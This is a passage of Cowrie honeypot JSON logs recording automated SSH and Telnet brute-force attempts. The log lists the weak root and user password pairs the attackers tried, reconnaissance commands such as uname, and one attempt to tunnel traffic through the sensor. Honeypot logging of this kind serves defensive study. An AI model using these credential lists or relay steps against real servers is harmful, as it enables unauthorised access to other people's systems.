com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:52:06.028306Z","src_ip":"45.125.211.194","session":"164822040e1f"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r","message":"login attempt [root/1q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:52:06.885056Z","src_ip":"45.125.211.194","session":"164822040e1f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:52:07.482909Z","src_ip":"45.125.211.194","session":"164822040e1f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:52:07.483588Z","src_ip":"45.125.211.194","session":"164822040e1f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:52:07.706835Z","src_ip":"45.125.211.194","session":"164822040e1f"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:52:07.707942Z","src_ip":"45.125.211.194","session":"164822040e1f"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":11434,"dst_ip":"1.2.3.4","dst_port":22,"session":"44b2bcc7e0b8","protocol":"ssh","message":"New connection: 45.125.211.194:11434 (1.2.3.4:22) [session: 44b2bcc7e0b8]","sensor":"my-vps","timestamp":"2025-08-28T03:52:20.500998Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:52:20.507945Z","src_ip":"45.125.211.194","session":"44b2bcc7e0b8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:52:20.728118Z","src_ip":"45.125.211.194","session":"44b2bcc7e0b8"}
{"eventid":"cowrie.login.success","username":"root","password":"root@123","message":"login attempt [root/root@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:52:21.602846Z","src_ip":"45.125.211.194","session":"44b2bcc7e0b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:52:22.105441Z","src_ip":"45.125.211.194","session":"44b2bcc7e0b8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:52:22.106134Z","src_ip":"45.125.211.194","session":"44b2bcc7e0b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:52:22.327422Z","src_ip":"45.125.211.194","session":"44b2bcc7e0b8"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:52:22.328463Z","src_ip":"45.125.211.194","session":"44b2bcc7e0b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":13533,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4f62390e3e1","protocol":"ssh","message":"New connection: 212.227.235.229:13533 (1.2.3.4:22) [session: b4f62390e3e1]","sensor":"my-vps","timestamp":"2025-08-28T03:52:28.899124Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:52:28.900223Z","src_ip":"212.227.235.229","session":"b4f62390e3e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":13923,"dst_ip":"1.2.3.4","dst_port":22,"session":"7cdb96a014e0","protocol":"ssh","message":"New connection: 212.227.235.229:13923 (1.2.3.4:22) [session: 7cdb96a014e0]","sensor":"my-vps","timestamp":"2025-08-28T03:52:29.006246Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:52:29.006957Z","src_ip":"212.227.235.229","session":"7cdb96a014e0"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T03:52:29.141513Z","src_ip":"212.227.235.229","session":"7cdb96a014e0"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:52:29.549656Z","src_ip":"212.227.235.229","session":"7cdb96a014e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T03:52:29.684573Z","session":"7cdb96a014e0"}
{"eventid":"cowrie.session.connect","src_ip":"121.178.94.180","src_port":53243,"dst_ip":"1.2.3.4","dst_port":23,"session":"25ec56584146","protocol":"telnet","message":"New connection: 121.178.94.180:53243 (1.2.3.4:23) [session: 25ec56584146]","sensor":"my-vps","timestamp":"2025-08-28T03:52:30.157509Z"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.140.97","src_port":56212,"dst_ip":"1.2.3.4","dst_port":23,"session":"72f50267b40b","protocol":"telnet","message":"New connection: 170.64.140.97:56212 (1.2.3.4:23) [session: 72f50267b40b]","sensor":"my-vps","timestamp":"2025-08-28T03:52:31.321576Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T03:52:31.937181Z","src_ip":"170.64.140.97","session":"72f50267b40b"}
{"eventid":"cowrie.session.closed","duration":2.958324909210205,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:52:34.279835Z","src_ip":"170.64.140.97","session":"72f50267b40b"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.140.97","src_port":56214,"dst_ip":"1.2.3.4","dst_port":23,"session":"419e76b14599","protocol":"telnet","message":"New connection: 170.64.140.97:56214 (1.2.3.4:23) [session: 419e76b14599]","sensor":"my-vps","timestamp":"2025-08-28T03:52:34.554795Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:52:35.154595Z","src_ip":"170.64.140.97","session":"419e76b14599"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:52:35.237337Z","src_ip":"170.64.140.97","session":"419e76b14599"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":10770,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecb3e33be67a","protocol":"ssh","message":"New connection: 45.125.211.194:10770 (1.2.3.4:22) [session: ecb3e33be67a]","sensor":"my-vps","timestamp":"2025-08-28T03:52:35.253948Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:52:35.267156Z","src_ip":"45.125.211.194","session":"ecb3e33be67a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:52:35.466150Z","src_ip":"45.125.211.194","session":"ecb3e33be67a"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T03:52:35.537843Z","src_ip":"170.64.140.97","session":"419e76b14599"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:52:36.303461Z","src_ip":"45.125.211.194","session":"ecb3e33be67a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:52:36.823142Z","src_ip":"45.125.211.194","session":"ecb3e33be67a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:52:36.823801Z","src_ip":"45.125.211.194","session":"ecb3e33be67a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:52:36.825875Z","src_ip":"170.64.140.97","session":"419e76b14599"}
{"eventid":"cowrie.session.closed","duration":2.27652907371521,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:52:36.831524Z","src_ip":"170.64.140.97","session":"419e76b14599"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:52:37.042646Z","src_ip":"45.125.211.194","session":"ecb3e33be67a"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:52:37.043693Z","src_ip":"45.125.211.194","session":"ecb3e33be67a"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":8962,"dst_ip":"1.2.3.4","dst_port":22,"session":"f25d2203c0eb","protocol":"ssh","message":"New connection: 45.125.211.194:8962 (1.2.3.4:22) [session: f25d2203c0eb]","sensor":"my-vps","timestamp":"2025-08-28T03:52:50.168489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:52:50.176429Z","src_ip":"45.125.211.194","session":"f25d2203c0eb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:52:50.383996Z","src_ip":"45.125.211.194","session":"f25d2203c0eb"}
{"eventid":"cowrie.login.failed","username":"wang","password":"123456","message":"login attempt [wang/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:52:51.210580Z","src_ip":"45.125.211.194","session":"f25d2203c0eb"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:52:52.420370Z","src_ip":"45.125.211.194","session":"f25d2203c0eb"}
{"eventid":"cowrie.session.closed","duration":31.54945969581604,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:53:01.706886Z","src_ip":"121.178.94.180","session":"25ec56584146"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":11365,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd46b892c74b","protocol":"ssh","message":"New connection: 45.125.211.194:11365 (1.2.3.4:22) [session: dd46b892c74b]","sensor":"my-vps","timestamp":"2025-08-28T03:53:04.945614Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:53:04.967155Z","src_ip":"45.125.211.194","session":"dd46b892c74b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:53:05.170894Z","src_ip":"45.125.211.194","session":"dd46b892c74b"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop123","message":"login attempt [hadoop/hadoop123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:53:06.051689Z","src_ip":"45.125.211.194","session":"dd46b892c74b"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:53:07.275450Z","src_ip":"45.125.211.194","session":"dd46b892c74b"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":65025,"dst_ip":"1.2.3.4","dst_port":22,"session":"e324e73f856e","protocol":"ssh","message":"New connection: 45.125.211.194:65025 (1.2.3.4:22) [session: e324e73f856e]","sensor":"my-vps","timestamp":"2025-08-28T03:53:19.732950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:53:19.751022Z","src_ip":"45.125.211.194","session":"e324e73f856e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:53:19.946336Z","src_ip":"45.125.211.194","session":"e324e73f856e"}
{"eventid":"cowrie.login.success","username":"root","password":"A123456a","message":"login attempt [root/A123456a] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:53:20.771007Z","src_ip":"45.125.211.194","session":"e324e73f856e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:53:21.207778Z","src_ip":"45.125.211.194","session":"e324e73f856e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:53:21.208812Z","src_ip":"45.125.211.194","session":"e324e73f856e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:53:21.417870Z","src_ip":"45.125.211.194","session":"e324e73f856e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:53:21.419070Z","src_ip":"45.125.211.194","session":"e324e73f856e"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":40086,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f6ad5905665","protocol":"ssh","message":"New connection: 80.94.95.15:40086 (1.2.3.4:22) [session: 3f6ad5905665]","sensor":"my-vps","timestamp":"2025-08-28T03:53:21.850932Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T03:53:21.851892Z","src_ip":"80.94.95.15","session":"3f6ad5905665"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T03:53:21.944306Z","src_ip":"80.94.95.15","session":"3f6ad5905665"}
{"eventid":"cowrie.login.failed","username":"user","password":"sooner","message":"login attempt [user/sooner] failed","sensor":"my-vps","timestamp":"2025-08-28T03:53:22.400548Z","src_ip":"80.94.95.15","session":"3f6ad5905665"}
{"eventid":"cowrie.login.failed","username":"user","password":"shitty","message":"login attempt [user/shitty] failed","sensor":"my-vps","timestamp":"2025-08-28T03:53:23.495408Z","src_ip":"80.94.95.15","session":"3f6ad5905665"}
